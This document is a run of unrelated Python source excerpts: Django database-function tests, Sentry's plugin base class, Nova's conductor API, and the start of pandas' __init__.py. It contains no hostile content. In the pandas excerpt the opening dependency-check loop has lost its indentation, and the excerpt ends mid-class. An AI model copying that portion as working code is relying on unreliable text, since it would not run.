            lambda a: a.display_name
        )
        # Fewer than two expressions is rejected when building the expression.
        with self.assertRaisesMessage(ValueError, 'Coalesce must take at least two expressions'):
            Author.objects.annotate(display_name=Coalesce('alias'))

    def test_coalesce_mixed_values(self):
        # Coalesce over columns of different field types (TextField summary
        # vs. CharField) requires an explicit output_field.
        a1 = Author.objects.create(name='John Smith', alias='smithj')
        a2 = Author.objects.create(name='Rhonda')
        ar1 = Article.objects.create(
            title="How to Django",
            text=lorem_ipsum,
            written=timezone.now(),
        )
        ar1.authors.add(a1)
        ar1.authors.add(a2)
        # mixed Text and Char
        article = Article.objects.annotate(
            headline=Coalesce('summary', 'text', output_field=TextField()),
        )
        self.assertQuerysetEqual(
            article.order_by('title'), [
                lorem_ipsum,
            ],
            lambda a: a.headline
        )
        # mixed Text and Char wrapped
        article = Article.objects.annotate(
            headline=Coalesce(Lower('summary'), Lower('text'), output_field=TextField()),
        )
        self.assertQuerysetEqual(
            article.order_by('title'), [
                lorem_ipsum.lower(),
            ],
            lambda a: a.headline
        )

    def test_concat(self):
        # NULL columns concatenate as empty strings (Jayden has neither
        # alias nor goes_by and yields '').
        Author.objects.create(name='Jayden')
        Author.objects.create(name='John Smith', alias='smithj', goes_by='John')
        Author.objects.create(name='Margaret', goes_by='Maggie')
        Author.objects.create(name='Rhonda', alias='adnohR')
        authors = Author.objects.annotate(joined=Concat('alias', 'goes_by'))
        self.assertQuerysetEqual(
            authors.order_by('name'), [
                '',
                'smithjJohn',
                'Maggie',
                'adnohR',
            ],
            lambda a: a.joined
        )
        with self.assertRaisesMessage(ValueError, 'Concat must take at least two expressions'):
            Author.objects.annotate(joined=Concat('alias'))

    def test_concat_many(self):
        # Concat accepts any number of expressions, including Value literals.
        Author.objects.create(name='Jayden')
        Author.objects.create(name='John Smith', alias='smithj', goes_by='John')
        Author.objects.create(name='Margaret', goes_by='Maggie')
        Author.objects.create(name='Rhonda', alias='adnohR')
        authors = Author.objects.annotate(
            joined=Concat('name', V(' ('), 'goes_by', V(')'), output_field=CharField()),
        )
        self.assertQuerysetEqual(
            authors.order_by('name'), [
                'Jayden ()',
                'John Smith (John)',
                'Margaret (Maggie)',
                'Rhonda ()',
            ],
            lambda a: a.joined
        )

    def test_concat_mixed_char_text(self):
        # Concat of Char and Text columns with an explicit TextField output.
        Article.objects.create(title='The Title', text=lorem_ipsum, written=timezone.now())
        article = Article.objects.annotate(
            title_text=Concat('title', V(' - '), 'text', output_field=TextField()),
        ).get(title='The Title')
        self.assertEqual(article.title + ' - ' + article.text, article.title_text)
        # wrap the concat in something else to ensure that we're still
        # getting text rather than bytes
        article = Article.objects.annotate(
            title_text=Upper(Concat('title', V(' - '), 'text', output_field=TextField())),
        ).get(title='The Title')
        expected = article.title + ' - ' + article.text
        self.assertEqual(expected.upper(), article.title_text)

    def test_lower(self):
        Author.objects.create(name='John Smith', alias='smithj')
        Author.objects.create(name='Rhonda')
        authors = Author.objects.annotate(lower_name=Lower('name'))
        self.assertQuerysetEqual(
            authors.order_by('name'), [
                'john smith',
                'rhonda',
            ],
            lambda a: a.lower_name
        )
        # Lower() also works on the right-hand side of update().
        Author.objects.update(name=Lower('name'))
        self.assertQuerysetEqual(
            authors.order_by('name'), [
                ('john smith', 'john smith'),
                ('rhonda', 'rhonda'),
            ],
            lambda a: (a.lower_name, a.name)
        )

    def test_upper(self):
        Author.objects.create(name='John Smith', alias='smithj')
        Author.objects.create(name='Rhonda')
        authors = Author.objects.annotate(upper_name=Upper('name'))
        self.assertQuerysetEqual(
            authors.order_by('name'), [
                'JOHN SMITH',
                'RHONDA',
            ],
            lambda a: a.upper_name
        )
        # Upper() also works on the right-hand side of update().
        Author.objects.update(name=Upper('name'))
        self.assertQuerysetEqual(
            authors.order_by('name'), [
                ('JOHN SMITH', 'JOHN SMITH'),
                ('RHONDA', 'RHONDA'),
            ],
            lambda a: (a.upper_name, a.name)
        )

    def test_length(self):
        # Length() of a NULL column is NULL, not 0 (see Rhonda's alias).
        Author.objects.create(name='John Smith', alias='smithj')
        Author.objects.create(name='Rhonda')
        authors = Author.objects.annotate(
            name_length=Length('name'),
            alias_length=Length('alias'))
        self.assertQuerysetEqual(
            authors.order_by('name'), [
                (10, 6),
                (6, None),
            ],
            lambda a: (a.name_length, a.alias_length)
        )
        # Function expressions are also usable inside filter() lookups.
        self.assertEqual(authors.filter(alias_length__lte=Length('name')).count(), 1)

    def test_substr(self):
        # Substr positions are 1-based; the length argument is optional.
        Author.objects.create(name='John Smith', alias='smithj')
        Author.objects.create(name='Rhonda')
        authors = Author.objects.annotate(name_part=Substr('name', 5, 3))
        self.assertQuerysetEqual(
            authors.order_by('name'), [
                ' Sm',
                'da',
            ],
            lambda a: a.name_part
        )
        authors = Author.objects.annotate(name_part=Substr('name', 2))
        self.assertQuerysetEqual(
            authors.order_by('name'), [
                'ohn Smith',
                'honda',
            ],
            lambda a: a.name_part
        )
        # if alias is null, set to first 5 lower characters of the name
        Author.objects.filter(alias__isnull=True).update(
            alias=Lower(Substr('name', 1, 5)),
        )
        self.assertQuerysetEqual(
            authors.order_by('name'), [
                'smithj',
                'rhond',
            ],
            lambda a: a.alias
        )

    def test_substr_start(self):
        Author.objects.create(name='John Smith', alias='smithj')
        a = Author.objects.annotate(
            name_part_1=Substr('name', 1),
            name_part_2=Substr('name', 2),
        ).get(alias='smithj')
        self.assertEqual(a.name_part_1[1:], a.name_part_2)
        # pos=0 is invalid and rejected when the expression is constructed.
        with six.assertRaisesRegex(self, ValueError, "'pos' must be greater than 0"):
            Author.objects.annotate(raises=Substr('name', 0))
| |
"""
sentry.plugins.base.v1
~~~~~~~~~~~~~~~~~~~~~~
:copyright: (c) 2010-2014 by the Sentry Team, see AUTHORS for more details.
:license: BSD, see LICENSE for more details.
"""
from __future__ import absolute_import, print_function
# Only the concrete Plugin base class is part of this module's public API.
__all__ = ('Plugin',)
from django.core.urlresolvers import reverse
from django.http import HttpResponseRedirect
from threading import local
from sentry.plugins.base.response import Response
class PluginMount(type):
    """Metaclass that fills in ``title`` and ``slug`` defaults on every
    concrete plugin class as it is defined.
    """

    def __new__(cls, name, bases, attrs):
        plugin_cls = super(PluginMount, cls).__new__(cls, name, bases, attrs)
        # Direct subclasses of the abstract interface (i.e. Plugin itself)
        # are left untouched.
        if IPlugin in bases:
            return plugin_cls
        if not plugin_cls.title:
            plugin_cls.title = plugin_cls.__name__
        if not plugin_cls.slug:
            plugin_cls.slug = plugin_cls.title.lower().replace(' ', '-')
        return plugin_cls
class IPlugin(local):
    """
    Plugin interface. Should not be inherited from directly.

    A plugin should be treated as if it were a singleton. The owner does not
    control when or how the plugin gets instantiated, nor is it guaranteed that
    it will happen, or happen more than once.

    >>> from sentry.plugins import Plugin # NOQA
    >>> class MyPlugin(Plugin):
    >>>     title = 'My Plugin'
    >>>
    >>>     def widget(self, request, group, **kwargs):
    >>>         return self.render('myplugin/widget.html')

    All children should allow ``**kwargs`` on all inherited methods.
    """
    # NOTE(review): subclasses threading.local, so instance attributes
    # (e.g. ``selected`` set in get_view_response) are per-thread.

    # Generic plugin information
    title = None
    slug = None
    description = None
    version = None
    author = None
    author_url = None
    resource_links = ()

    # Configuration specifics
    conf_key = None
    conf_title = None

    project_conf_form = None
    project_conf_template = 'sentry/plugins/project_configuration.html'
    site_conf_form = None
    site_conf_template = 'sentry/plugins/site_configuration.html'

    # Global enabled state
    enabled = True
    can_disable = True

    # Should this plugin be enabled by default for projects?
    project_default_enabled = False

    def _get_option_key(self, key):
        # Namespace option keys per plugin: "<conf_key>:<key>".
        return '%s:%s' % (self.get_conf_key(), key)

    def is_enabled(self, project=None):
        """
        Returns a boolean representing if this plugin is enabled.

        If ``project`` is passed, it will limit the scope to that project.

        >>> plugin.is_enabled()
        """
        if not self.enabled:
            return False
        if not self.can_disable:
            return True
        if not self.can_enable_for_projects():
            return True
        if project:
            # A per-project 'enabled' option overrides the class default.
            project_enabled = self.get_option('enabled', project)
            if project_enabled is not None:
                return project_enabled
            else:
                return self.project_default_enabled
        return True

    def reset_options(self, project=None, user=None):
        # NOTE(review): helpers are imported at call time, presumably to
        # avoid circular imports at module load — confirm.
        from sentry.plugins.helpers import reset_options
        return reset_options(self.get_conf_key(), project, user)

    def get_option(self, key, project=None, user=None):
        """
        Returns the value of an option in your plugins keyspace, or ``None`` if
        one is not present.

        If ``project`` is passed, it will limit the scope to that project's keyspace.

        >>> value = plugin.get_option('my_option')
        """
        from sentry.plugins.helpers import get_option
        return get_option(self._get_option_key(key), project, user)

    def set_option(self, key, value, project=None, user=None):
        """
        Updates the value of an option in your plugins keyspace.

        If ``project`` is passed, it will limit the scope to that project's keyspace.

        >>> plugin.set_option('my_option', 'http://example.com')
        """
        from sentry.plugins.helpers import set_option
        return set_option(self._get_option_key(key), value, project, user)

    def unset_option(self, key, project=None, user=None):
        """
        Removes an option in your plugins keyspace.

        If ``project`` is passed, it will limit the scope to that project's keyspace.

        >>> plugin.unset_option('my_option')
        """
        from sentry.plugins.helpers import unset_option
        return unset_option(self._get_option_key(key), project, user)

    def get_url(self, group):
        """
        Returns the absolute URL to this plugins group action handler.

        >>> plugin.get_url(group)
        """
        return reverse('sentry-group-plugin-action', args=(group.organization.slug, group.project.slug, group.pk, self.slug))

    def get_conf_key(self):
        """
        Returns a string representing the configuration keyspace prefix for this plugin.
        """
        # Fall back to a normalized form of the title when no explicit
        # conf_key was declared.
        if not self.conf_key:
            return self.get_conf_title().lower().replace(' ', '_')
        return self.conf_key

    def get_conf_title(self):
        """
        Returns a string representing the title to be shown on the configuration page.
        """
        return self.conf_title or self.get_title()

    def has_site_conf(self):
        return self.site_conf_form is not None

    def has_project_conf(self):
        return self.project_conf_form is not None

    def can_enable_for_projects(self):
        """
        Returns a boolean describing whether this plugin can be enabled on a per project basis
        """
        return True

    def get_form_initial(self, project=None):
        # Initial data for the configuration form; subclasses may override.
        return {}

    # Response methods

    def redirect(self, url):
        """
        Returns a redirect response type.
        """
        return HttpResponseRedirect(url)

    def render(self, template, context=None):
        """
        Given a template name, and an optional context (dictionary), returns a
        ready-to-render response.

        Default context includes the plugin instance.

        >>> plugin.render('template.html', {'hello': 'world'})
        """
        if context is None:
            context = {}
        # Every plugin template can reference itself as {{ plugin }}.
        context['plugin'] = self
        return Response(template, context)

    # The following methods are specific to web requests

    def get_title(self):
        """
        Returns the general title for this plugin.

        >>> plugin.get_title()
        """
        return self.title

    def get_description(self):
        """
        Returns the description for this plugin. This is shown on the plugin configuration
        page.

        >>> plugin.get_description()
        """
        return self.description

    def get_resource_links(self):
        """
        Returns a list of tuples pointing to various resources for this plugin.

        >>> def get_resource_links(self):
        >>>     return [
        >>>         ('Documentation', 'http://sentry.readthedocs.org'),
        >>>         ('Bug Tracker', 'https://github.com/getsentry/sentry/issues'),
        >>>         ('Source', 'https://github.com/getsentry/sentry'),
        >>>     ]
        """
        return self.resource_links

    def get_view_response(self, request, group):
        from sentry.models import Event
        from sentry.permissions import can_admin_group, can_remove_group

        # Only respond when the request targets this plugin's action URL.
        self.selected = request.path == self.get_url(group)

        if not self.selected:
            return

        response = self.view(request, group)

        if not response:
            return

        if isinstance(response, HttpResponseRedirect):
            return response

        if not isinstance(response, Response):
            raise NotImplementedError('Use self.render() when returning responses.')

        # Provide an (possibly empty) event so templates can rely on it.
        event = group.get_latest_event() or Event()
        event.group = group

        return response.respond(request, {
            'plugin': self,
            'project': group.project,
            'group': group,
            'event': event,
            'can_admin_event': can_admin_group(request.user, group),
            'can_remove_event': can_remove_group(request.user, group),
        })

    def view(self, request, group, **kwargs):
        """
        Handles the view logic. If no response is given, we continue to the next action provider.

        >>> def view(self, request, group, **kwargs):
        >>>     return self.render('myplugin/about.html')
        """

    def before_events(self, request, group_list, **kwargs):
        """
        Allows preprocessing of groups in the list view.

        This is generally useful if you need to cache lookups
        for something like ``tags`` which would otherwise do
        multiple queries.

        If you use this **at all** you should ensure it's already
        reset on each execution.

        As an example, here's how we might get a reference to ticket ids we were
        storing per event, in an efficient O(1) manner.

        >>> def before_events(self, request, event_list, **kwargs):
        >>>     prefix = self.get_conf_key()
        >>>     GroupMeta.objects.get_value_bulk(event_list, '%s:tid' % prefix)
        """

    def tags(self, request, group, tag_list, **kwargs):
        """
        Modifies the tag list for a grouped message.

        A tag is a string, already marked safe or later escaped, that is shown inline with
        the event.

        This must return ``tag_list``.

        >>> def tags(self, request, group, tag_list, **kwargs):
        >>>     tag_list.append(':(')
        >>>     return tag_list
        """
        return tag_list

    def actions(self, request, group, action_list, **kwargs):
        """
        Modifies the action list for a grouped message.

        An action is a tuple containing two elements:

        ('Action Label', '/uri/to/action/')

        This must return ``action_list``.

        >>> def actions(self, request, group, action_list, **kwargs):
        >>>     action_list.append(('Google', 'http://google.com'))
        >>>     return action_list
        """
        return action_list

    def panels(self, request, group, panel_list, **kwargs):
        """
        Modifies the panel list for a grouped message.

        A panel is a tuple containing two elements:

        ('Panel Label', '/uri/to/panel/')

        This must return ``panel_list``.

        >>> def panels(self, request, group, action_list, **kwargs):
        >>>     panel_list.append((self.get_title(), self.get_url(group)))
        >>>     return panel_list
        """
        return panel_list

    def widget(self, request, group, **kwargs):
        """
        Renders as a widget in the group details sidebar.

        >>> def widget(self, request, group, **kwargs):
        >>>     return self.render('myplugin/widget.html')
        """

    # Server side signals which do not have request context

    def has_perm(self, user, perm, *objects, **kwargs):
        """
        Given a user, a permission name, and an optional list of objects
        within context, returns an override value for a permission.

        :param user: either an instance of ``AnonymousUser`` or ``User``.
        :param perm: a string, such as "edit_project"
        :param objects: an optional list of objects

        If your plugin does not modify this permission, simply return ``None``.

        For example, has perm might be called like so:

        >>> has_perm(user, 'add_project')

        It also might be called with more context:

        >>> has_perm(user, 'edit_project', project)

        Or with even more context:

        >>> has_perm(user, 'configure_project_plugin', project, plugin)
        """
        return None

    def missing_perm_response(self, request, perm, *args, **objects):
        """
        Given a user, a permission name, and an optional mapping of objects
        within a context, returns a custom response.

        :param user: either an instance of ``AnonymousUser`` or ``User``.
        :param perm: a string, such as "edit_project"
        :param objects: an optional mapping of objects

        If your plugin does not need to override this response, simply return
        ``None``.
        """

    def on_alert(self, alert, **kwargs):
        """
        Called when a new alert is generated.

        :param alert: an instance of ``Alert``

        >>> def on_alert(self, alert, **kwargs):
        >>>     print 'New alert!', alert.message
        >>>     print alert.get_absolute_url()
        """

    def is_regression(self, group, event, **kwargs):
        """
        Called on new events when the group's status is resolved.
        Return True if this event is a regression, False if it is not,
        None to defer to other plugins.

        :param group: an instance of ``Group``
        :param event: an instance of ``Event``

        >>> def is_regression(self, group, event, **kwargs):
        >>>     # regression if 'version' tag has a value we haven't seen before
        >>>     seen_versions = set(t[0] for t in group.get_unique_tags("version"))
        >>>     event_version = dict(event.get_tags()).get("version")
        >>>     return event_version not in seen_versions
        """

    def post_process(self, group, event, is_new, is_sample, **kwargs):
        """
        Post processes an event after it has been saved.

        :param group: an instance of ``Group``
        :param event: an instance of ``Event``
        :param is_new: a boolean describing if this group is new, or has changed state
        :param is_sample: a boolean describing if this event was stored, or sampled

        >>> def post_process(self, event, **kwargs):
        >>>     print 'New event created:', event.id
        >>>     print group.get_absolute_url()
        """

    def get_tags(self, event, **kwargs):
        """
        Return additional tags to add to this instance.

        Tags should be a list of tuples.

        >>> def get_tags(self, event, **kwargs):
        >>>     return [('tag-name', 'tag-value')]
        """

    def get_notification_forms(self, **kwargs):
        """
        Provides additional UserOption forms for the Notification Settings page.

        Must return an iterable.

        >>> def get_notification_forms(self, **kwargs):
        >>>     return [MySettingsForm]
        """
        return []

    def is_testable(self, **kwargs):
        """
        Returns True if this plugin is able to be tested.
        """
        # Duck-typed: a plugin is testable when it defines test_configuration.
        return hasattr(self, 'test_configuration')
class Plugin(IPlugin):
    """
    A plugin should be treated as if it were a singleton. The owner does not
    control when or how the plugin gets instantiated, nor is it guaranteed that
    it will happen, or happen more than once.
    """
    # Version of the plugin protocol implemented by this base class.
    __version__ = 1
    # NOTE: Python 2 style metaclass declaration; PluginMount fills in
    # title/slug defaults for subclasses at class-creation time.
    __metaclass__ = PluginMount
| |
# Copyright 2012 IBM Corp.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""Handles all requests to the conductor service."""
from oslo_config import cfg
from oslo_log import log as logging
import oslo_messaging as messaging
from nova import baserpc
from nova.conductor import manager
from nova.conductor import rpcapi
from nova.i18n import _LI, _LW
from nova import utils
# Options controlling how the conductor service is reached and scaled.
conductor_opts = [
    cfg.BoolOpt('use_local',
                default=False,
                help='Perform nova-conductor operations locally'),
    cfg.StrOpt('topic',
               default='conductor',
               help='The topic on which conductor nodes listen'),
    cfg.StrOpt('manager',
               default='nova.conductor.manager.ConductorManager',
               help='Full class name for the Manager for conductor'),
    cfg.IntOpt('workers',
               help='Number of workers for OpenStack Conductor service. '
                    'The default will be the number of CPUs available.')
]
conductor_group = cfg.OptGroup(name='conductor',
                               title='Conductor Options')
CONF = cfg.CONF
# Register everything under the [conductor] section of the config.
CONF.register_group(conductor_group)
CONF.register_opts(conductor_opts, conductor_group)
LOG = logging.getLogger(__name__)
class LocalAPI(object):
    """A local version of the conductor API that does database updates
    locally instead of via RPC.
    """

    def __init__(self):
        # TODO(danms): This needs to be something more generic for
        # other/future users of this sort of functionality.
        self._manager = utils.ExceptionHelper(manager.ConductorManager())

    def wait_until_ready(self, context, *args, **kwargs):
        """No-op: the in-process manager is available immediately."""
        pass

    def instance_update(self, context, instance_uuid, **updates):
        """Perform an instance update in the database."""
        return self._manager.instance_update(
            context, instance_uuid, updates, 'compute')

    def provider_fw_rule_get_all(self, context):
        """Delegate provider firewall rule lookup to the manager."""
        return self._manager.provider_fw_rule_get_all(context)

    def vol_usage_update(self, context, vol_id, rd_req, rd_bytes, wr_req,
                         wr_bytes, instance, last_refreshed=None,
                         update_totals=False):
        """Forward a volume usage update to the manager."""
        return self._manager.vol_usage_update(
            context, vol_id, rd_req, rd_bytes, wr_req, wr_bytes, instance,
            last_refreshed, update_totals)

    def compute_node_create(self, context, values):
        """Delegate compute node creation to the manager."""
        return self._manager.compute_node_create(context, values)

    def security_groups_trigger_members_refresh(self, context, group_ids):
        """Delegate a security group members refresh to the manager."""
        return self._manager.security_groups_trigger_members_refresh(
            context, group_ids)

    def object_backport(self, context, objinst, target_version):
        """Delegate an object version backport to the manager."""
        return self._manager.object_backport(context, objinst, target_version)
class LocalComputeTaskAPI(object):
    """Compute-task API that runs the ComputeTaskManager in-process."""

    def __init__(self):
        # TODO(danms): This needs to be something more generic for
        # other/future users of this sort of functionality.
        self._manager = utils.ExceptionHelper(
            manager.ComputeTaskManager())

    def resize_instance(self, context, instance, extra_instance_updates,
                        scheduler_hint, flavor, reservations,
                        clean_shutdown=True):
        """Hand a cold migration/resize off to the task manager."""
        # NOTE(comstud): 'extra_instance_updates' is not used here but is
        # needed for compatibility with the cells_rpcapi version of this
        # method.
        self._manager.migrate_server(
            context, instance, scheduler_hint, live=False, rebuild=False,
            flavor=flavor, block_migration=None, disk_over_commit=None,
            reservations=reservations, clean_shutdown=clean_shutdown)

    def live_migrate_instance(self, context, instance, host_name,
                              block_migration, disk_over_commit):
        """Hand a live migration to *host_name* off to the task manager."""
        self._manager.migrate_server(
            context, instance, {'host': host_name}, True, False, None,
            block_migration, disk_over_commit, None)

    def build_instances(self, context, instances, image,
                        filter_properties, admin_password, injected_files,
                        requested_networks, security_groups,
                        block_device_mapping, legacy_bdm=True):
        """Spawn instance builds without blocking the caller."""
        utils.spawn_n(self._manager.build_instances, context,
                      instances=instances, image=image,
                      filter_properties=filter_properties,
                      admin_password=admin_password,
                      injected_files=injected_files,
                      requested_networks=requested_networks,
                      security_groups=security_groups,
                      block_device_mapping=block_device_mapping,
                      legacy_bdm=legacy_bdm)

    def unshelve_instance(self, context, instance):
        """Spawn an unshelve of *instance* without blocking the caller."""
        utils.spawn_n(self._manager.unshelve_instance, context,
                      instance=instance)

    def rebuild_instance(self, context, instance, orig_image_ref, image_ref,
                         injected_files, new_pass, orig_sys_metadata,
                         bdms, recreate=False, on_shared_storage=False,
                         preserve_ephemeral=False, host=None, kwargs=None):
        """Spawn a rebuild of *instance* without blocking the caller."""
        # kwargs unused but required for cell compatibility.
        utils.spawn_n(self._manager.rebuild_instance, context,
                      instance=instance,
                      new_pass=new_pass,
                      injected_files=injected_files,
                      image_ref=image_ref,
                      orig_image_ref=orig_image_ref,
                      orig_sys_metadata=orig_sys_metadata,
                      bdms=bdms,
                      recreate=recreate,
                      on_shared_storage=on_shared_storage,
                      host=host,
                      preserve_ephemeral=preserve_ephemeral)
class API(LocalAPI):
    """Conductor API that does updates via RPC to the ConductorManager."""

    def __init__(self):
        # Unlike LocalAPI, the manager here is an RPC proxy.
        self._manager = rpcapi.ConductorAPI()
        self.base_rpcapi = baserpc.BaseAPI(topic=CONF.conductor.topic)

    def wait_until_ready(self, context, early_timeout=10, early_attempts=10):
        '''Wait until a conductor service is up and running.

        This method calls the remote ping() method on the conductor topic until
        it gets a response. It starts with a shorter timeout in the loop
        (early_timeout) up to early_attempts number of tries. It then drops
        back to the globally configured timeout for rpc calls for each retry.
        '''
        attempt = 0
        timeout = early_timeout
        # if we show the timeout message, make sure we show a similar
        # message saying that everything is now working to avoid
        # confusion
        has_timedout = False
        while True:
            # NOTE(danms): Try ten times with a short timeout, and then punt
            # to the configured RPC timeout after that
            if attempt == early_attempts:
                timeout = None
            attempt += 1
            # NOTE(russellb): This is running during service startup. If we
            # allow an exception to be raised, the service will shut down.
            # This may fail the first time around if nova-conductor wasn't
            # running when this service started.
            try:
                self.base_rpcapi.ping(context, '1.21 GigaWatts',
                                      timeout=timeout)
                if has_timedout:
                    LOG.info(_LI('nova-conductor connection '
                                 'established successfully'))
                break
            except messaging.MessagingTimeout:
                has_timedout = True
                LOG.warning(_LW('Timed out waiting for nova-conductor. '
                                'Is it running? Or did this service start '
                                'before nova-conductor? '
                                'Reattempting establishment of '
                                'nova-conductor connection...'))

    def instance_update(self, context, instance_uuid, **updates):
        """Perform an instance update in the database."""
        # NOTE(review): the last argument is a service-name string —
        # 'conductor' here versus 'compute' in LocalAPI.
        return self._manager.instance_update(context, instance_uuid,
                                             updates, 'conductor')
class ComputeTaskAPI(object):
    """ComputeTask API that queues up compute tasks for nova-conductor."""

    def __init__(self):
        self.conductor_compute_rpcapi = rpcapi.ComputeTaskAPI()

    def resize_instance(self, context, instance, extra_instance_updates,
                        scheduler_hint, flavor, reservations,
                        clean_shutdown=True):
        """Queue a cold migration/resize on the conductor."""
        # NOTE(comstud): 'extra_instance_updates' is not used here but is
        # needed for compatibility with the cells_rpcapi version of this
        # method.
        self.conductor_compute_rpcapi.migrate_server(
            context, instance, scheduler_hint, live=False, rebuild=False,
            flavor=flavor, block_migration=None, disk_over_commit=None,
            reservations=reservations, clean_shutdown=clean_shutdown)

    def live_migrate_instance(self, context, instance, host_name,
                              block_migration, disk_over_commit):
        """Queue a live migration to *host_name* on the conductor."""
        self.conductor_compute_rpcapi.migrate_server(
            context, instance, {'host': host_name}, True, False, None,
            block_migration, disk_over_commit, None)

    def build_instances(self, context, instances, image, filter_properties,
                        admin_password, injected_files, requested_networks,
                        security_groups, block_device_mapping,
                        legacy_bdm=True):
        """Queue instance builds on the conductor."""
        rpc = self.conductor_compute_rpcapi
        rpc.build_instances(context,
                            instances=instances, image=image,
                            filter_properties=filter_properties,
                            admin_password=admin_password,
                            injected_files=injected_files,
                            requested_networks=requested_networks,
                            security_groups=security_groups,
                            block_device_mapping=block_device_mapping,
                            legacy_bdm=legacy_bdm)

    def unshelve_instance(self, context, instance):
        """Queue an unshelve of *instance* on the conductor."""
        self.conductor_compute_rpcapi.unshelve_instance(context,
                                                        instance=instance)

    def rebuild_instance(self, context, instance, orig_image_ref, image_ref,
                         injected_files, new_pass, orig_sys_metadata,
                         bdms, recreate=False, on_shared_storage=False,
                         preserve_ephemeral=False, host=None, kwargs=None):
        """Queue a rebuild of *instance* on the conductor."""
        # kwargs unused but required for cell compatibility
        self.conductor_compute_rpcapi.rebuild_instance(
            context,
            instance=instance,
            new_pass=new_pass,
            injected_files=injected_files,
            image_ref=image_ref,
            orig_image_ref=orig_image_ref,
            orig_sys_metadata=orig_sys_metadata,
            bdms=bdms,
            recreate=recreate,
            on_shared_storage=on_shared_storage,
            preserve_ephemeral=preserve_ephemeral,
            host=host)
| |
# flake8: noqa
__docformat__ = "restructuredtext"
# Let users know if they're missing any of our hard dependencies
hard_dependencies = ("numpy", "pytz", "dateutil")
missing_dependencies = []
for dependency in hard_dependencies:
try:
__import__(dependency)
except ImportError as e:
missing_dependencies.append(f"{dependency}: {e}")
if missing_dependencies:
raise ImportError(
"Unable to import required dependencies:\n" + "\n".join(missing_dependencies)
)
del hard_dependencies, dependency, missing_dependencies
# numpy compat
from pandas.compat.numpy import (
_np_version_under1p16,
_np_version_under1p17,
_np_version_under1p18,
_is_numpy_dev,
)
try:
from pandas._libs import hashtable as _hashtable, lib as _lib, tslib as _tslib
except ImportError as e: # pragma: no cover
# hack but overkill to use re
module = str(e).replace("cannot import name ", "")
raise ImportError(
f"C extension: {module} not built. If you want to import "
"pandas from the source directory, you may need to run "
"'python setup.py build_ext --inplace --force' to build the C extensions first."
) from e
from pandas._config import (
get_option,
set_option,
reset_option,
describe_option,
option_context,
options,
)
# let init-time option registration happen
import pandas.core.config_init
from pandas.core.api import (
# dtype
Int8Dtype,
Int16Dtype,
Int32Dtype,
Int64Dtype,
UInt8Dtype,
UInt16Dtype,
UInt32Dtype,
UInt64Dtype,
CategoricalDtype,
PeriodDtype,
IntervalDtype,
DatetimeTZDtype,
StringDtype,
BooleanDtype,
# missing
NA,
isna,
isnull,
notna,
notnull,
# indexes
Index,
CategoricalIndex,
Int64Index,
UInt64Index,
RangeIndex,
Float64Index,
MultiIndex,
IntervalIndex,
TimedeltaIndex,
DatetimeIndex,
PeriodIndex,
IndexSlice,
# tseries
NaT,
Period,
period_range,
Timedelta,
timedelta_range,
Timestamp,
date_range,
bdate_range,
Interval,
interval_range,
DateOffset,
# conversion
to_numeric,
to_datetime,
to_timedelta,
# misc
Grouper,
factorize,
unique,
value_counts,
NamedAgg,
array,
Categorical,
set_eng_float_format,
Series,
DataFrame,
)
from pandas.core.arrays.sparse import SparseDtype
from pandas.tseries.api import infer_freq
from pandas.tseries import offsets
from pandas.core.computation.api import eval
from pandas.core.reshape.api import (
concat,
lreshape,
melt,
wide_to_long,
merge,
merge_asof,
merge_ordered,
crosstab,
pivot,
pivot_table,
get_dummies,
cut,
qcut,
)
import pandas.api
from pandas.util._print_versions import show_versions
from pandas.io.api import (
# excel
ExcelFile,
ExcelWriter,
read_excel,
# parsers
read_csv,
read_fwf,
read_table,
# pickle
read_pickle,
to_pickle,
# pytables
HDFStore,
read_hdf,
# sql
read_sql,
read_sql_query,
read_sql_table,
# misc
read_clipboard,
read_parquet,
read_orc,
read_feather,
read_gbq,
read_html,
read_json,
read_stata,
read_sas,
read_spss,
)
from pandas.io.json import _json_normalize as json_normalize
from pandas.util._tester import test
import pandas.testing
import pandas.arrays
# use the closest tagged version if possible
from ._version import get_versions
v = get_versions()
# Prefer the closest git tag when available; fall back to the raw version.
__version__ = v.get("closest-tag", v["version"])
__git_version__ = v.get("full-revisionid")
# Keep the module namespace clean.
del get_versions, v
# GH 27101
# TODO: remove Panel compat in 1.0
if pandas.compat.PY37:
    # Python 3.7+ supports module-level __getattr__ (PEP 562), so deprecated
    # top-level names can be resolved lazily, emitting a warning only when
    # they are actually accessed.
    def __getattr__(name):
        import warnings

        if name == "Panel":
            warnings.warn(
                "The Panel class is removed from pandas. Accessing it "
                "from the top-level namespace will also be removed in the next version",
                FutureWarning,
                stacklevel=2,
            )

            # Empty placeholder so existing references do not crash outright.
            class Panel:
                pass

            return Panel
        elif name == "datetime":
            warnings.warn(
                "The pandas.datetime class is deprecated "
                "and will be removed from pandas in a future version. "
                "Import from datetime module instead.",
                FutureWarning,
                stacklevel=2,
            )

            from datetime import datetime as dt

            return dt
        elif name == "np":
            warnings.warn(
                "The pandas.np module is deprecated "
                "and will be removed from pandas in a future version. "
                "Import numpy directly instead",
                FutureWarning,
                stacklevel=2,
            )
            import numpy as np

            return np
        elif name in {"SparseSeries", "SparseDataFrame"}:
            warnings.warn(
                f"The {name} class is removed from pandas. Accessing it from "
                "the top-level namespace will also be removed in the next version",
                FutureWarning,
                stacklevel=2,
            )

            # Anonymous placeholder type with the removed class's name.
            return type(name, (), {})
        elif name == "SparseArray":
            warnings.warn(
                "The pandas.SparseArray class is deprecated "
                "and will be removed from pandas in a future version. "
                "Use pandas.arrays.SparseArray instead.",
                FutureWarning,
                stacklevel=2,
            )
            from pandas.core.arrays.sparse import SparseArray as _SparseArray

            return _SparseArray
        raise AttributeError(f"module 'pandas' has no attribute '{name}'")

else:
    # Python < 3.7 has no module-level __getattr__, so placeholder
    # classes/objects are defined eagerly instead.

    class Panel:
        pass

    class SparseDataFrame:
        pass

    class SparseSeries:
        pass

    class __numpy:
        # Proxy standing in for the deprecated ``pandas.np`` alias: every
        # attribute access warns, then delegates to the real numpy module.
        def __init__(self):
            import numpy as np
            import warnings

            self.np = np
            self.warnings = warnings

        def __getattr__(self, item):
            self.warnings.warn(
                "The pandas.np module is deprecated "
                "and will be removed from pandas in a future version. "
                "Import numpy directly instead",
                FutureWarning,
                stacklevel=2,
            )
